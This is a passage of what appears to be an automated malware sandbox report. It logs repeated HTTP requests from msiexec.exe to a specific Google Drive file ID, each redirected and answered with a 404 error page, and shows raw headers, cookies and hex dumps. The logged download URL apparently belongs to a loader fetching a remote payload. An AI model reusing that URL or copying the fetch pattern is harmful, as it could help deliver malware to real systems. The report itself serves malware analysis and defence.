                                                                  Connection: close
                                                                  2025-01-10 14:17:04 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 39 6e 74 4e 79 38 45 77 4c 4a 77 51 5f 4c 47 37 39 58 4a 62 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="99ntNy8EwLJwQ_LG79XJbg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  38192.168.2.550014142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:05 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:05 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:05 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-NNrzaKmjsEiygM2roo9hvA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  39192.168.2.550015142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:06 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:06 UTC1851INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFiumC5mjSAuR8Thxp-9smvk96kNGK40X8btGfBdNMcUgyTdN12xMKMaMvec5PhG1XOs4VMzO8rGxcU
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:06 GMT
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-Ci_6wEgPZXsEHYUerXJV-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
                                                                  2025-01-10 14:17:06 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5a 42 45 75 72 67 36 79 51 46 6c 72 37 54 4f 47 5f 58 64 37 4f 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZBEurg6yQFlr7TOG_Xd7Ow">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  40192.168.2.550016142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:07 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:07 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:07 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-Cc0leI_EQEmwWQp_iVEL6g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  41192.168.2.550017142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:08 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:08 UTC1844INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFIdbgRrvNNLnozHOl3TQneTZwe218rq8qt8QDcqeiTxkhl7e8sHayV-9sy6HFtkN-P9alu3
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:08 GMT
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-ALzk0BOSUAxrAe8ogUiR5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
                                                                  2025-01-10 14:17:08 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 59 55 43 43 74 62 6d 55 61 56 76 46 4c 6f 6a 55 65 6b 71 4f 4b 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="YUCCtbmUaVvFLojUekqOKA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  42192.168.2.550018142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:09 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:10 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:09 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-DCM3QYB0yhP_IuuOExxLeg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  43192.168.2.550019142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:10 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:11 UTC1844INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFIdbgTHqb2Bxgxnj4EusxEMhgDH2FhFGum8HKY__9I29zccfafUdvmbhGH_TNxNZxFKN8Tf
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:11 GMT
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-2QVEF4r-ZKE4YJ0n4fgWYw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
                                                                  2025-01-10 14:17:11 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 64 41 75 36 6a 6b 61 78 32 5f 51 70 76 76 68 45 6a 37 52 52 55 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="dAu6jkax2_QpvvhEj7RRUg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  44192.168.2.550020142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:11 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:12 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:12 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Content-Security-Policy: script-src 'nonce-OfYkpidAKjJYNXP-NI1RsA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  45192.168.2.550021142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:12 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:13 UTC1844INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFIdbgROTSJJSL0ZlC77uRTac3nOX8vNAr9LjKGd7QqTif49kzzyyMHGjtutIl4Kgjt7Mnbw
                                                                  Content-Type: text/html; charset=utf-8
